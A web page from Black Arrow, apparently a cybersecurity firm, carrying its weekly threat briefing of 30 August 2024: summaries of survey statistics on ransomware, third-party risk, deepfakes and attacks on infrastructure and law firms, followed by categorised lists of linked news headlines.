Businesses still ready to invest in Gen AI, with risk management a top priority | ZDNET
Inside NSA's partnerships with AI makers to prevent future attacks - Washington Times
Other News
Critical infrastructure sustained 13 cyber attacks per second in 2023 | TechRadar
SQL injection bug allows anyone to skip airport security • The Register
TfL cyber attack could be due to poor cyber-hygiene, expert says - Verdict
TfL cyber attack could've brought London 'to a standstill' (telecomstechnews.com)
Can Every Business Afford To Be A Target? (informationsecuritybuzz.com)
We must break tech monopolies before they break us (thenextweb.com)
Cyber criminals use legitimate software for attacks increasing (securitybrief.co.nz)
Is the "Network" Defendable? - Security Boulevard
Surge in cyber risks will create new exposures (emergingrisks.co.uk)
Five notorious cyber attacks that targeted governments (theconversation.com)
Vulnerability Management
Tenable finds only 3% of vulnerabilities pose significant risks (securitybrief.co.nz)
Businesses must act now to address the zero day surge | TechRadar
Vulnerabilities
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical Issues (thehackernews.com)
Critical Flaws in Progress Software WhatsUp Gold Expose Systems to Full Compromise - SecurityWeek
Cisco warns of backdoor admin account in Smart Licensing Utility (bleepingcomputer.com)
Godzilla Fileless Backdoor Exploits Atlassian Confluence Vulnerability (cybersecuritynews.com)
Hacktivist Group Exploit WinRAR Vulnerability to Encrypt Windows & Linux (cybersecuritynews.com)
Chrome 128 Updates Patch High-Severity Vulnerabilities - SecurityWeek
Your Google Pixel Phone's September Update Arrived (droid-life.com)
YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel | Ars Technica
Worried about the YubiKey 5 vulnerability? Here's why I'm not | ZDNET
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code Execution (thehackernews.com)
ServiceNow Vulnerabilities: CVE-2024-4789 and CVE-2024-5217 | UpGuard
Log4j Continues to act as Organisational Vulnerability - Security Boulevard
DrayTek Vulnerabilities Added to CISA KEV Catalog Exploited in Global Campaign - SecurityWeek
Vulnerabilities In Two WordPress Contact Form Plugins Affect +1.1 Million (searchenginejournal.com)
VMware fixed a code execution flaw in Fusion hypervisor (securityaffairs.com)
D-Link says it is not fixing four RCE flaws in DIR-846W routers (bleepingcomputer.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 30 August 2024
Black Arrow Cyber Threat Intelligence Briefing 30 August 2024:
-76% of Managed Service Providers (MSPs) Faced an Infrastructure Cyber Attack in Last 12 Months
-Third-Party Risk Management is Under the Spotlight
-46% of Enterprises Experience Four or More Ransomware Attacks in a Single Year, Affecting ERP Applications and Systems 89% of the Time
-Cyber Security Spending is Going to Surge in 2025, and AI Threats are a Key Factor
-Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security
-Half of Enterprises Suffer Breaches Despite Heavy Security Investments
-Why the 80-20 Rule No Longer Works for Cyber Security
-Deepfakes: Seeing is No Longer Believing
-Online Scam Cycles are Getting Shorter and More Effective
-Cyber Attacks on Critical Infrastructure Increased by 30% in One Year
-Russia is Signalling It Could Take Out the West's Internet and GPS. There's No Good Backup Plan
-NATO Believes Russia Poses a Threat to the West’s Internet and GPS Services
-Cyber Attacks on UK Law Firms Surge by 77% Amid Rising Ransomware Threat
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
76% of Managed Service Providers (MSPs) Faced an Infrastructure Cyber Attack in Last 12 Months
A recent report by Netwrix highlights that 76% of Managed Service Providers (MSPs) experienced a cyber attack on their infrastructure in the past 12 months, mirroring the 79% seen across all organisations. Of those attacked, 51% incurred unplanned expenses to address security gaps, while 31% suffered a loss of competitive edge, and 27% faced compliance fines - higher than the averages in other sectors. Notably, nearly half (49%) of cloud security incidents involved user account compromises, while 46% of on-premises attacks were related to ransomware or other malware. These findings underscore the critical need for robust security measures in the MSP sector.
Third-Party Risk Management is Under the Spotlight
Recent research highlights a critical vulnerability in the financial sector's digital supply chain resilience, exposed by the recent CrowdStrike IT outage. Despite regulatory pressure from bodies such as the Bank of England and the EU's Digital Operational Resilience Act (DORA), only 20.8% of financial professionals report having stressed exit plans in most third-party agreements, crucial for managing risks from supplier disruptions. With DORA set to be implemented by January 2025, the findings are concerning, as less than 19% of respondents expressed complete confidence in their third-party exit strategies, underscoring the urgent need for improved operational resilience in financial services.
46% of Enterprises Experience Four or More Ransomware Attacks in a Single Year, Affecting ERP Applications and Systems 89% of the Time
Onapsis has revealed that 83% of organisations have faced at least one ransomware attack in the past year, with 46% experiencing four or more, and 14% facing ten or more attacks. Notably, 89% of these attacks impacted Enterprise Resource Planning (ERP) systems, leading to significant business disruptions, with 61% of attacks resulting in at least 24 hours of downtime. As AI-enhanced threats grow, the impact on ERP systems is expected to worsen. The research underscores the inadequacy of generic security solutions, with 93% of respondents agreeing on the need for dedicated ERP security to protect business-critical applications.
Cyber Security Spending is Going to Surge in 2025, and AI Threats are a Key Factor
Gartner's latest research predicts a significant rise in global cyber security spending, expected to reach $183.9 billion in 2024 and increase by 15.1% to $212 billion in 2025. This surge is driven by the adoption of generative AI tools, which are heightening investments in application, data, and infrastructure security. The use of large language models (LLMs) in large-scale social engineering attacks is anticipated to contribute to 17% of cyber attacks or data leaks by 2027. Additionally, the growing shift to cloud services is expected to boost demand for cloud security solutions, with the Cloud Access Security Broker (CASB) and Cloud Workload Protection Platform (CWPP) market projected to hit $8.7 billion by 2025.
Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security
Effective cyber security relies on multiple layers of defence, with file integrity monitoring and change detection being two of the most crucial. These layers are managed through an organisation's change management programme, which ensures that changes are carefully planned, tested, documented, and approved. In the past, making undocumented changes without oversight was common, but today, such practices are a fast track to unemployment. Modern change management involves detailed coordination and approval processes, often by committees, to minimise risks and prevent disruptions to business operations. These layers, while essential, underscore that no system is entirely risk-free.
Half of Enterprises Suffer Breaches Despite Heavy Security Investments
Recent reports indicate a sharp rise in data breach frequency and costs, with the average breach now costing $4.88 million, a 10% increase from the previous year. Notably, 40% of breaches involve data spread across multiple environments, including cloud and on-premises, taking an average of 283 days to identify and contain. Despite having extensive security measures, 51% of enterprises still reported breaches in the last 24 months, with 93% experiencing significant disruptions. Human error remains a critical factor, contributing to 68% of breaches. Additionally, 98% of businesses are linked to breaches through third-party relationships, highlighting the need for robust security across the supply chain.
Why the 80-20 Rule No Longer Works for Cyber Security
A recent analysis challenges the application of the Pareto Principle in cyber security, highlighting that monitoring only 80% of assets leaves organisations significantly exposed. The report reveals that over 90% of CISOs acknowledge breaches are more likely to originate from unknown or unmanaged assets rather than well-monitored ones. Using the metaphor of a ship with unchecked sections, the study emphasises that neglecting even a small percentage of assets can lead to catastrophic outcomes. It questions why some security leaders persist with this approach, given that the unmonitored 20% often contains the most exploitable vulnerabilities. The findings underscore the critical need for comprehensive asset management to effectively mitigate cyber risks.
Deepfakes: Seeing is No Longer Believing
The rising threat of deepfakes is significantly impacting organisations and public trust, with 47% of companies having encountered deepfakes and 70% believing these AI-generated attacks could heavily affect them. Despite 73% of organisations implementing measures against deepfakes, confidence in these defences remains low, with 62% fearing their efforts are insufficient. Public concern is also high, with 81% of Americans worried about the impact of deepfakes on election integrity. However, many people overestimate their ability to detect deepfakes, with 60% believing they could identify one, despite the increasing sophistication of these AI-generated threats.
Online Scam Cycles are Getting Shorter and More Effective
A recent Chainalysis mid-year report highlights that online scam cycles have become significantly shorter and more effective, with cyber criminals increasingly favouring smaller, faster, and more targeted campaigns. The report reveals that 43% of scam revenues on the blockchain were sent to wallets created within the past year, a sharp rise from 29.9% in 2022. This shift indicates a surge in newly launched scams, with the average duration of scams dropping from 271 days in 2020 to just 42 days in 2024. This trend underscores the growing agility and sophistication of cyber criminals in executing their fraudulent activities.
Cyber Attacks on Critical Infrastructure Increased by 30% in One Year
A recent report from KnowBe4 reveals a significant 30% increase in cyber attacks on critical infrastructure, amounting to over 420 million attacks between January 2023 and 2024, or approximately 13 attacks every second. Globally, the weekly average of cyber incidents has quadrupled since 2020, with a doubling just in 2023. The report also highlights growing vulnerabilities in the US power grid, with around 60 new vulnerable points emerging daily, raising the total from 21,000 in 2022 to approximately 24,000. These findings underscore the escalating risks facing critical infrastructure and the urgent need for enhanced security measures.
Russia is Signalling It Could Take Out the West's Internet and GPS. There's No Good Backup Plan
NATO intelligence officials have raised concerns that Russia may disrupt global internet and GPS networks, with recent reports suggesting that Russia is mapping undersea fibre optic cables, which carry 95% of international data. Russia's deputy chairman of the Security Council, Dmitry Medvedev, issued a stark warning after the Nord Stream 2 pipeline attack, suggesting Russia could target these vital communications links. Incidents such as the disruption of telecommunications between Sweden and Estonia in 2023 and the grounding of flights due to GPS interference highlight the growing threat. NATO is increasing surveillance, but experts stress the urgent need for resilient backup systems to protect against potential cyber attacks on this critical infrastructure.
Cyber Attacks on UK Law Firms Surge by 77% Amid Rising Ransomware Threat
A recent study has revealed a 77% increase in successful cyber attacks on UK law firms over the past year, rising from 538 to 954 incidents. Law firms are particularly attractive targets for cyber criminals due to the sensitive and valuable data they hold, leading to frequent ransomware attacks and blackmail attempts. According to a report by the UK’s National Cyber Security Centre, nearly three-quarters of the UK’s top 100 law firms have been impacted by cyber-attacks. The average ransom demand following an attack is $2.47 million, with firms typically paying $1.65 million. Despite the escalating threat, 35% of UK law firms still lack a cyber mitigation plan. Experts recommend stronger cyber defences, including data segregation, to better protect against these attacks.
Sources:
https://www.helpnetsecurity.com/2024/08/29/third-party-risk-management-spotlight/
https://www.helpnetsecurity.com/2024/08/27/data-breach-trends/
https://www.scmagazine.com/perspective/why-the-80-20-rule-no-longer-works-for-cybersecurity
https://www.helpnetsecurity.com/2024/08/29/deepfakes-technology-threat/
https://cyberscoop.com/online-scamming-cycles-shorter-more-effective-chainalysis/
https://www.businessinsider.com/russia-could-take-out-west-internet-gps-back-up-plan-2024-8
https://informationsecuritybuzz.com/cyberattacks-uk-law-firms-ransomware/
Governance, Risk and Compliance
How hard is it to navigate and comply with global cyber security regulations? | Business Wire
Cyber attacks on law firms jumped by 77% over the past year | Law Gazette
Half of enterprises suffer breaches despite heavy security investments - Help Net Security
Why the 80-20 rule no longer works for cyber security | SC Media (scmagazine.com)
Evolving Cyber Security: Aligning Strategy with Business Growth - Security Boulevard
Global Cyber Security spending to surge by 15% next year (electronicspecifier.com)
Cyber security spending is going to surge in 2025 – and AI threats are a key factor | ITPro
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
European Agencies are Taking Cyber Security Seriously and Your Business Should, Too | Entrepreneur
Why cyber risk quantification is ‘becoming more mainstream’ - Security - CRN Australia
Boards Need a New Approach to Technology
If you’re a CISO without D&O insurance, you may need to fight for it | CSO Online
Cyber Security Maturity: A Must-Have on the CISO’s Agenda - SecurityWeek
Business leaders are losing faith in IT, according to this IBM study. Here's why | ZDNET
Cyber Hygiene: Constant Defence Against Evolving B2B Threats (pymnts.com)
6 hot cyber security trends — and 2 going cold | CSO Online
US firms see spike in cyber security services as data breaches increase: ISG - Reinsurance News
Why Companies Need Real-Time Compliance (informationsecuritybuzz.com)
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
BlackSuit Ransomware Threat Actors Demand Up To $500 Million - Security Boulevard
BlackSuit Ransomware Deployed After 15 Days From Initial Access (cybersecuritynews.com)
Ransomware Attacks, Demands, And Payments Rise In Q2 (informationsecuritybuzz.com)
Lateral movement: Clearest sign of unfolding ransomware attack - Help Net Security
Ransomware Group Defences Are Better Than Fortune 100 Firms (govinfosecurity.com)
FBI: RansomHub ransomware breached 210 victims since February (bleepingcomputer.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Threat Group 'Bling Libra' Pivots to Extortion for Cloud Attacks (darkreading.com)
BlackByte Ransomware Exploits VMware ESXi Flaw in Latest Attack Wave (thehackernews.com)
Pioneer Kitten: Iranian hackers partnering with ransomware affiliates - Help Net Security
PoorTry Windows driver evolves into a full-featured EDR wiper (bleepingcomputer.com)
Ransomware attacks increasingly target ERP systems (securitybrief.co.nz)
'Big-game hunting' - Ransomware gangs are focusing on more lucrative attacks - Exponential-e Blog
77% of Educational Institutions Spotted a Cyber Attack Within the Last 12 Months (darkreading.com)
Ransomware Victims
US oil giant Halliburton confirms cyber attack behind systems shutdown (bleepingcomputer.com)
BlackSuit ransomware stole data of 950,000 from software vendor (bleepingcomputer.com)
Hunters International ransomware gang threatens to leak US Marshals data | SC Media (scmagazine.com)
Blood donation: NHS stocks are still in short supply after June cyber attack | The BMJ
Cyber attack disrupts Seattle’s Tacoma International Airport and seaport - The Hindu
Ransomware Gang Leaks Data Allegedly Stolen From Microchip Technology - SecurityWeek
77% of Educational Institutions Spotted a Cyber Attack Within the Last 12 Months (darkreading.com)
Patelco confirms thousands of customers hit in ransomware attack | TechRadar
McLaren Health Care restores network weeks after ransomware attack | Healthcare Dive
Play ransomware hackers claim attack on US manufacturer Microchip Technology (therecord.media)
Phishing & Email Based Attacks
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
File sharing phishing attacks increase 350 percent (betanews.com)
PSA: Watch out for phishing attacks with fake banking app updates - 9to5Mac
Attackers exploiting trust in VPNs for phishing attacks | Cybernews
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
Spoofing: What It Is And How To Spot It | HuffPost Life
2.5 Million Reward Offered For Cyber Criminal Linked To Notorious Angler Exploit Kit | Tripwire
Other Social Engineering
Scammers are increasingly using messaging and social media apps to attack | ZDNET
AI voice generators: What they can do and how they work | ZDNET
Deepfakes: Seeing is no longer believing - Help Net Security
Powerful Spyware Exploits Enable a New String of 'Watering Hole' Attacks | WIRED
Don’t call it quishing but, please, do take it seriously | TechFinitive
Spoofing: What It Is And How To Spot It | HuffPost Life
How Telecom Vulnerabilities Can Be a Threat to Cyber Security Posture (darkreading.com)
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
Threat actor lures victims to malware-laden VPN page via call, text | SC Media (scmagazine.com)
Artificial Intelligence
AI voice generators: What they can do and how they work | ZDNET
Deepfakes: Seeing is no longer believing - Help Net Security
Cyber security spending is going to surge in 2025 – and AI threats are a key factor | ITPro
1 in 5 top companies mention generative AI in their financial reports, but not in a good way | ZDNET
Why LLMs Are Just the Tip of the AI Security Iceberg (darkreading.com)
News Desk 2024: Hacking Microsoft Copilot Is Scary Easy (darkreading.com)
6 hot cyber security trends — and 2 going cold | CSO Online
OpenAI and Anthropic to collaborate with US government on AI safety | ZDNET
2FA/MFA
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
How Telecom Vulnerabilities Can Be a Threat to Cyber Security Posture (darkreading.com)
Malware
Hackers infect ISPs with malware that steals customers’ credentials | Ars Technica
A new macOS data stealer is going after Apple users | TechRadar
Cthulhu Stealer malware aimed to take macOS user data (appleinsider.com)
New Linux Malware 'sedexp' Hides Credit Card Skimmers Using Udev Rules (thehackernews.com)
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Microsoft: Exchange Online mistakenly tags emails as malware (bleepingcomputer.com)
This sneaky Linux malware went undetected for years, and is using all-new attack tactics | TechRadar
New vulnerabilities, infostealer compromise on the rise | SC Media (scmagazine.com)
Hackers linked to Russian government found using some very familiar malware tools | TechRadar
Fake Palo Alto GlobalProtect used as lure to backdoor enterprises (bleepingcomputer.com)
Threat actor lures victims to malware-laden VPN page via call, text | SC Media (scmagazine.com)
New Tickler malware used to backdoor US govt, defence orgs (bleepingcomputer.com)
Hackers Exploited Digital Marketing Tools to Launch Malicious Campaigns (cybersecuritynews.com)
New Cyber Attack Targets Chinese-Speaking Businesses with Cobalt Strike Payloads (thehackernews.com)
Mobile
Attackers draining bank accounts using new Android card cloning malware | Cybernews
PSA: Watch out for phishing attacks with fake banking app updates - 9to5Mac
Denial of Service/DoS/DDOS
Mind the Geopolitical Bot: Defending Digitalisation in an Era of Mass Disruption (institute.global)
Internet of Things – IoT
Unpatchable 0-day in surveillance cam is being exploited to install Mirai | Ars Technica
Data Breaches/Leaks
A third of companies hit by data breach amid rising concerns (securitybrief.co.nz)
5 Of The Biggest Security Breaches To Ever Hit Microsoft (slashgear.com)
NHS staff mobile numbers revealed in data breach - BBC News
Scottish health boards hit by cyber-attack (holyrood.com)
500k Impacted by Texas Dow Employees Credit Union Data Breach - SecurityWeek
AMD data reportedly offered for sale on dark web souk • The Register
Hackers claim to have hit US Marshals Service with a major cyber attack | TechRadar
Park’N Fly notifies 1 million customers of data breach (bleepingcomputer.com)
Patelco confirms thousands of customers hit in ransomware attack | TechRadar
DICK’s Sporting Goods says confidential data exposed in cyber attack (bleepingcomputer.com)
Staff details stolen in Banham Poultry cyber attack - BBC News
Watchdog warns FBI is very sloppy on safe data storage • The Register
Organised Crime & Criminal Actors
Ransomware Group Defences Are Better Than Fortune 100 Firms (govinfosecurity.com)
Greasy Opal's CAPTCHA solver still serving cyber crime after 16 years (bleepingcomputer.com)
Telegram: Why Extremists, Criminal Activity Thrive on Chat App - Bloomberg
Hacker USDoD Sheds Light on Identity | MSSP Alert
Adversaries love bots, short-lived IP addresses, out-of-band domains - Help Net Security
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking (darkreading.com)
Crypto scammers who hacked McDonald's Instagram account say they stole $700,000 (bitdefender.com)
Insider Risk and Insider Threats
Microsoft security tools probed for workplace surveillance • The Register
Insurance
Meeting The New Cyber Insurance Requirements (informationsecuritybuzz.com)
If you’re a CISO without D&O insurance, you may need to fight for it | CSO Online
Cyber Insurance: A Few Security Technologies, a Big Difference in Premiums (darkreading.com)
Insurer Seeks to Rescind Policy Over Privacy Law Compliance (bloomberglaw.com)
Supply Chain and Third Parties
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
76% of MSPs faced an infrastructure cyber attack in last 12 months | Security Magazine
BlackSuit ransomware stole data of 950,000 from software vendor (bleepingcomputer.com)
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Cloud/SaaS
File sharing phishing attacks increase 350 percent (betanews.com)
SaaS security woes continue to haunt cyber teams | ITPro
How to Strengthen Your SaaS Security Posture Management - Security Boulevard
Threat Group 'Bling Libra' Pivots to Extortion for Cloud Attacks (darkreading.com)
Enterprise SaaS apps are still a major security risk | TechRadar
When Convenience Costs: CISOs Struggle With SaaS Security Oversight - SecurityWeek
Cyber criminals capitalize on travel industry's peak season - Help Net Security
Outages
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Identity and Access Management
Why ransomware attackers target Active Directory - Help Net Security
The Evolving Landscape Of Identity And Access Management In 2024 (informationsecuritybuzz.com)
Encryption
Denmark wants to ban encrypted Telegram, Signal chats | Cybernews
Linux and Open Source
New Linux Malware 'sedexp' Hides Credit Card Skimmers Using Udev Rules (thehackernews.com)
Linux malware sedexp uses udev rules for persistence and evasion (securityaffairs.com)
This sneaky Linux malware went undetected for years, and is using all-new attack tactics | TechRadar
Passwords, Credential Stuffing & Brute Force Attacks
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
If You're Still Using This Insecure Password Method, It's Time to Stop (makeuseof.com)
Social Media
Scammers are increasingly using messaging and social media apps to attack | ZDNET
Telegram Founder Pavel Durov Arrested in France for Content Moderation Failures (thehackernews.com)
Malvertising
Hackers Exploited Digital Marketing Tools to Launch Malicious Campaigns (cybersecuritynews.com)
Regulations, Fines and Legislation
Uber Hit With €290m GDPR Fine - Infosecurity Magazine (infosecurity-magazine.com)
UK Labour Party reprimanded over cyber attack backlog by privacy regulator (therecord.media)
The NIS2 Directive: How far does it reach? - Help Net Security
Cyber law reform should be top of Labour's policy list | Computer Weekly
Lawmakers must incentivize cyber protection for critical infrastructure | CyberScoop
Models, Frameworks and Standards
The NIS2 Directive: How far does it reach? - Help Net Security
NIS2 Directive: Focusing on Critical Infrastructure Security (govinfosecurity.com)
5 open source Mitre ATT&CK tools | TechTarget
Data Protection
Uber Hit With €290m GDPR Fine - Infosecurity Magazine (infosecurity-magazine.com)
UK Labour Party reprimanded over cyber attack backlog by privacy regulator (therecord.media)
Watchdog reprimands Labour following data protection breach - BBC News
Law Enforcement Action and Take Downs
Telegram Founder Pavel Durov Arrested in France for Content Moderation Failures (thehackernews.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Telegram CEO arrest is fuzzy warning to Big Tech | Reuters
Stakes high for European Union after arrest of Telegram co-founder | European Union | The Guardian
Russia-France ties hit new low after Telegram boss' arrest, Moscow says | Reuters
Telegram is a bigger headache than Elon Musk’s X for the EU – POLITICO
2.5 Million Reward Offered For Cyber Criminal Linked To Notorious Angler Exploit Kit | Tripwire
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
The New Frontiers of Cyber-Warfare: Insights From Black Hat 2024 (itprotoday.com)
Ramping Up Cyber Defences Against Adversarial States | AFCEA International
Military 'silent hangar' to help protect against foreign GPS jamming - GOV.UK
Nation State Actors
China
Hackers infect ISPs with malware that steals customers’ credentials | Ars Technica
Chinese government hackers infiltrate at least two top US ISPs | TechRadar
Chinese Volt Typhoon hackers exploited Versa zero-day to breach ISPs, MSPs (bleepingcomputer.com)
Chinese cyber attacks hit nearly half of German firms, study – DW – 08/28/2024
Cyber crime and sabotage cost German firms $300 bln in past year | Reuters
Hackers Use Rare Stealth Techniques to Down Asian Military, Gov't Orgs (darkreading.com)
US efforts to stop Chinese hackers haven’t been fully effective, FBI official says - Nextgov/FCW
Russia
Russia Could Take Out West's Internet, No Good Back up Plan - Business Insider
Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyber Attack (thehackernews.com)
In Russia, questions swirl over Telegram CEO's arrest - BBC News
The bewildering politics of Telegram - POLITICO
Russia's APT29 using spyware exploits in new campaigns | TechTarget
Powerful Spyware Exploits Enable a New String of 'Watering Hole' Attacks | WIRED
Latvia and Ukraine sign memorandum of understanding on cyber security | Ukrainska Pravda
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Iran
Tehran’s state-sponsored hackers helping cybergangs deploy ransomware | Cybernews
Pioneer Kitten: Iranian hackers partnering with ransomware affiliates - Help Net Security
New Tickler malware used to backdoor US govt, defence orgs (bleepingcomputer.com)
Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp (thehackernews.com)
Iran hunts down double agents with fake recruiting sites • The Register
Notorious Iranian Hackers Have Been Targeting the Space Industry With a New Backdoor | WIRED
North Korea
South Korean Spies Exploit WPS Office Zero-Day - Infosecurity Magazine (infosecurity-magazine.com)
North Korean Hackers Target Developers with Malicious npm Packages (thehackernews.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Telegram: Why Extremists, Criminal Activity Thrive on Chat App - Bloomberg
Cyber Attacks Deployed in Retaliation to Telegram CEO Arrest | MSSP Alert
Tools and Controls
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security (darkreading.com)
Global Cyber Security spending to surge by 15% next year (electronicspecifier.com)
Third-party risk management is under the spotlight - Help Net Security
Is the vulnerability disclosure process glitched? How CISOs are being left in the dark | CSO Online
How to Strengthen Your SaaS Security Posture Management - Security Boulevard
Remote Work: A Ticking Time Bomb Waiting to be Exploited (bleepingcomputer.com)
When Convenience Costs: CISOs Struggle With SaaS Security Oversight - SecurityWeek
Combating alert fatigue by prioritizing malicious intent | SC Media (scmagazine.com)
Attackers exploiting trust in VPNs for phishing attacks | Cybernews
Ransomware attacks increasingly target ERP systems (securitybrief.co.nz)
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
Why cyber risk quantification is ‘becoming more mainstream’ - Security - CRN Australia
Cyber Insurance: A Few Security Technologies, a Big Difference in Premiums (darkreading.com)
Cyber Hygiene: Constant Defence Against Evolving B2B Threats (pymnts.com)
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Why Every Business Should Prioritize Confidential Computing (darkreading.com)
How Security Teams are Strengthening Their Threat Hunting - Security Boulevard
Why Companies Need Real-Time Compliance (informationsecuritybuzz.com)
10 key steps for crafting a robust business continuity plan (networkingplus.co.uk)
Focus on What Matters Most: Exposure Management and Your Attack Surface (thehackernews.com)
After cyber security lab wouldn’t use AV software, US accuses Georgia Tech of fraud | Ars Technica
How to use the NIST CSF and AI RMF to address AI risks | TechTarget
5 open source Mitre ATT&CK tools | TechTarget
Inside the role of a ransomware negotiator - CBS News
The art and science behind Microsoft threat hunting: Part 3 | Microsoft Security Blog
Other News
Cyber attacks on critical infrastructure increase 30 percent (betanews.com)
Cyber attacks on law firms jumped by 77% over the past year | Law Gazette
Why the 80-20 rule no longer works for cyber security | SC Media (scmagazine.com)
Evolving Cyber Security: Aligning Strategy with Business Growth - Security Boulevard
Types of hackers: Black hat, white hat, red hat and more | TechTarget
6 hot cyber security trends — and 2 going cold | CSO Online
Cyber Security Maturity: A Must-Have on the CISO’s Agenda - SecurityWeek
Top Travel Sites Have Some First-Class Security Issues to Clean Up (darkreading.com)
A macro look at the most pressing cyber security risks - Help Net Security
Cyber Accountability: US Strategy Puts Onus on Big Tech (inforisktoday.com)
Microsoft hosts a closed security summit? How transparent • The Register
Nothing to Smile About: Hacks on Dental Practices Swell (databreachtoday.co.uk)
Threat Actors Target the Middle East Using Fake Palo Alto GlobalProtect Tool | Trend Micro (US)
Cyber threats that shaped the first half of 2024 - Help Net Security
A coherent Labour cyber strategy depends on consistency | Computer Weekly
Vulnerability Management
Vulnerabilities rise in first half of 2024 (betanews.com)
Is the vulnerability disclosure process glitched? How CISOs are being left in the dark | CSO Online
New vulnerabilities, infostealer compromise on the rise | SC Media (scmagazine.com)
How to make Windows updates less annoying, in three easy steps | ZDNET
Windows 11 updates are about to become a lot easier with hotpatching | PCWorld
Cyber criminals capitalise on travel industry's peak season - Help Net Security
Vulnerabilities
SonicWall Patches Critical SonicOS Vulnerability - SecurityWeek
Chrome just patched some high-risk security flaws, so go update now | PCWorld
Microsoft Edge RCE Vulnerability Let Attackers Take Control of the System (cybersecuritynews.com)
CISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports (thehackernews.com)
PoC Exploit for Zero-Click Vulnerability Made Available to the Masses (darkreading.com)
BlackByte Ransomware Exploits VMware ESXi Flaw in Latest Attack Wave (thehackernews.com)
3CX Phone System Local Privilege Escalation Vulnerability - Security Boulevard
Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking (darkreading.com)
Cisco Patches Multiple NX-OS Software Vulnerabilities - SecurityWeek
Update Windows now, there are some worrying security hacks on the way | TechRadar
Second Apache OFBiz Vulnerability Exploited in Attacks - SecurityWeek
WordPress Elementor Widgets Add-On Vulnerability (searchenginejournal.com)
Critical Fortra FileCatalyst Workflow vulnerability patched (CVE-2024-6633) - Help Net Security
South Korean Spies Exploit WPS Office Zero-Day - Infosecurity Magazine (infosecurity-magazine.com)
Still have a Windows 10 PC? You have 5 options before support ends next year | ZDNET
3 easy ways to make Windows updates less annoying | ZDNET
Critical Flaws in Traccar GPS System Expose Users to Remote Attacks (thehackernews.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
